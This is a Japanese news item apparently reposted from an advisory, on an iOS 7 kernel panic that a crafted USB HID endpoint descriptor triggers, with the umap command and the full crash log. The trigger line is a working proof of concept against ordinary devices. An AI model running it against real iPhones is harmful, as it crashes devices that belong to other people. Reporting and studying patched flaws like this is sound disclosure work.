iOS 7の欠陥によりカーネルモードでの任意コード実行が可能となり、iPhoneが再起動、Appleが修正を発表

すべての目がiOS 8の将来のリリースに向けられている中、セキュリティ研究者がiPhone、iPad、iPod Touchデバイスで動作している現在のオペレーティングシステムに高リスクの欠陥を発見しました。セキュリティ研究者のアンディ・デイビスが提出した概念実証によると、iOS 7にはカーネルモードでの高リスクの任意コード実行を可能にする欠陥があることが判明しました。このコードが実行されると、iOSデバイスのカーネルがパニックを起こし、再起動します。

アンディは2013年9月26日にApple Incに概念実証を提出し、最終的に2014年3月10日にAppleはこの欠陥を軽減するためのパッチを発表しました。全コードはGithubで入手可能です。実行に関する簡単な詳細は以下の通りです：

脆弱性の説明

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

特定の値がHIDデバイスのUSBエンドポイント記述子に供給されると

Appleデバイスのカーネルがパニックを起こし、再起動します

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

技術的詳細

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.

このバグは以下のようにumapを使用してトリガーできます（https://github.com/nccgroup/umap）

sudo python3 ./umap.py -P /dev/ttyUSB0 -s 09:00:00:E:46

bMaxPacketSize = 0xff

インシデント識別子: F0856C91-7616-4DAC-9907-C504401D9951

CrashReporterキー: 7ed804add6a0507b6a8ca9625f0bcd14abc6801b

ハードウェアモデル: iPhone3,1

日付/時間: 2013-09-26 12:35:46.892 +0100

OSバージョン: iOS 7.0 (11A465)

panic(cpu 0 caller 0x882220a5): kernel abort type 4: fault_type=0x1,

fault_addr=0x28

r0: 0x00000003 r1: 0x889e70bd r2: 0x00000012 r3: 0xfffffffe

r4: 0x9ae83000 r5: 0x00000003 r6: 0x00000000 r7: 0x87ff3d78

r8: 0x00000000 r9: 0x00000000 r10: 0x00000000 r11: 0x00000001

r12: 0x87ff3d50 sp: 0x87ff3d10 lr: 0x88af52bf pc: 0x88af51f8

cpsr: 0x80000033 fsr: 0x00000005 far: 0x00000028

デバッガーメッセージ: panic

OSバージョン: 11A465

カーネルバージョン: Darwin Kernel Version 14.0.0: Tue Aug 13 21:39:05 PDT 2013;

root:xnu-2423.1.73~3/RELEASE_ARM_S5L8930X

iBootバージョン: iBoot-1940.1.75

セキュアブート?: YES

パニックログバージョン: 1

カーネルスライド: 0x0000000008200000

カーネルテキストベース: 0x88201000

エポック時間: sec usec

ブート: 0x52441b69 0x00000000

スリープ: 0x00000000 0x00000000

ウェイク: 0x00000000 0x00000000

カレンダー: 0x52441bb5 0x00056497

パニックタスク 0x896f8d48: 12856ページ, 114スレッド: pid 0: kernel_task
パニックスレッド: 0x8023de90, バックトレース: 0x87ff3a48
lr: 0x88317889 fp: 0x87ff3a7c
lr: 0x883181f7 fp: 0x87ff3ab0
lr: 0x882b783b fp: 0x87ff3ad4
lr: 0x882220a5 fp: 0x87ff3ba0
lr: 0x8821c7c4 fp: 0x87ff3d78
lr: 0x88af8687 fp: 0x87ff3da8
lr: 0x8828b5bd fp: 0x87ff3dd0
lr: 0x889d6d29 fp: 0x87ff3df0
lr: 0x889da2f3 fp: 0x87ff3e18
lr: 0x8828b5bd fp: 0x87ff3e40
lr: 0x889da14f fp: 0x87ff3e7c
lr: 0x88acb8e7 fp: 0x87ff3eb8
lr: 0x88ac9815 fp: 0x87ff3ed4
lr: 0x884b24d3 fp: 0x87ff3f60
lr: 0x882cf869 fp: 0x87ff3fa8
lr: 0x8821f05c fp: 0x00000000

Appleはこの欠陥にリファレンス番号600217059を付与し、脆弱性を軽減するためのパッチをリリースしました。ダウンロードはこちらから。

リソース: CXSECURITY